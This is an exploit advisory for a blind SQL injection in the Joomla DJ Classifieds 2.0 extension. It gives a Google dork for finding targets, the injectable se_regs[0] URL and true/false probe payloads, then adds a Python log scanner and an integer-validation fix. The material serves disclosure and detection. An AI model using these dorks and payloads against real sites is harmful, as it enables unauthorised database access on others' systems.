
# Title : Joomla DJ Classifieds Extension 2.0 - Blind SQL Injection Vulnerability
# Published : 2013-05-06
# Author :


# Exploit Title: Joomla - DJ Classifieds - Time-Based Blind SQL Injection
# Google Dork: inurl:"index.php/dj-classifieds/" or inurl:"/dj-classifieds/"
# Date: 4/5/2013
# Exploit Author: Napsterakos
# Vendor Homepage: http://design-joomla.eu
# Software Link: -
# Version: 2.0
# Tested on: Linux


Link: http://server/joomla/index.php/dj-classifieds/

Exploit: http://server/joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=[SQLi]

# Exploit-DB Note:
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=0
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=1

Credits to: Greek Hacking Scene
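
The Exploit-DB note above probes se_regs[0] with a true/false condition pair, and the same parameter can be watched for in web server access logs. The Python below is an added example, not part of the original advisory or the extension's code: it flags requests under the dj-classifieds path whose se_regs[] values are not plain integers. The log lines are constructed, and treating se_regs values as numeric ids is an assumption based on the se_regs[0]=1 base value shown in the note.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/May/2013:10:00:01 +0000] "GET /joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/May/2013:10:00:07 +0000] "GET /joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs%5B0%5D=1%20and%201%3D0 HTTP/1.1" 200 4010',
    '203.0.113.9 - - [06/May/2013:10:00:09 +0000] "GET /joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1+and+1=1 HTTP/1.1" 200 5120',
    '198.51.100.2 - - [06/May/2013:10:01:00 +0000] "GET /joomla/index.php/about?se_regs[0]=x HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PARAM_RE = re.compile(r'^se_regs\[[^\]]*\]$')  # se_regs[0], se_regs[1], ...
INT_RE = re.compile(r'^\d+$')                  # assumption: values are numeric ids


def suspicious_se_regs(line):
    """Return (client_ip, param, value) tuples for non-integer se_regs[] values."""
    m = REQUEST_RE.match(line)
    if not m:
        return []  # not a request line we understand
    client, target = m.groups()
    parts = urlsplit(target)
    if "/dj-classifieds/" not in parts.path:
        return []  # only the component named in the advisory
    hits = []
    # parse_qsl percent-decodes names and values, so %5B0%5D matches [0] too.
    for name, value in parse_qsl(parts.query):
        if PARAM_RE.match(name) and not INT_RE.match(value):
            hits.append((client, name, value))
    return hits


def scan(lines):
    """Collect every suspicious se_regs[] hit across an iterable of log lines."""
    return [hit for line in lines for hit in suspicious_se_regs(line)]


if __name__ == "__main__":
    for client, name, value in scan(SAMPLE_LOG):
        print(f"{client} sent non-numeric {name}={value!r}")
```

The same integer-only rule, applied server-side to every se_regs[] element before it reaches a query, is the corresponding input-validation control.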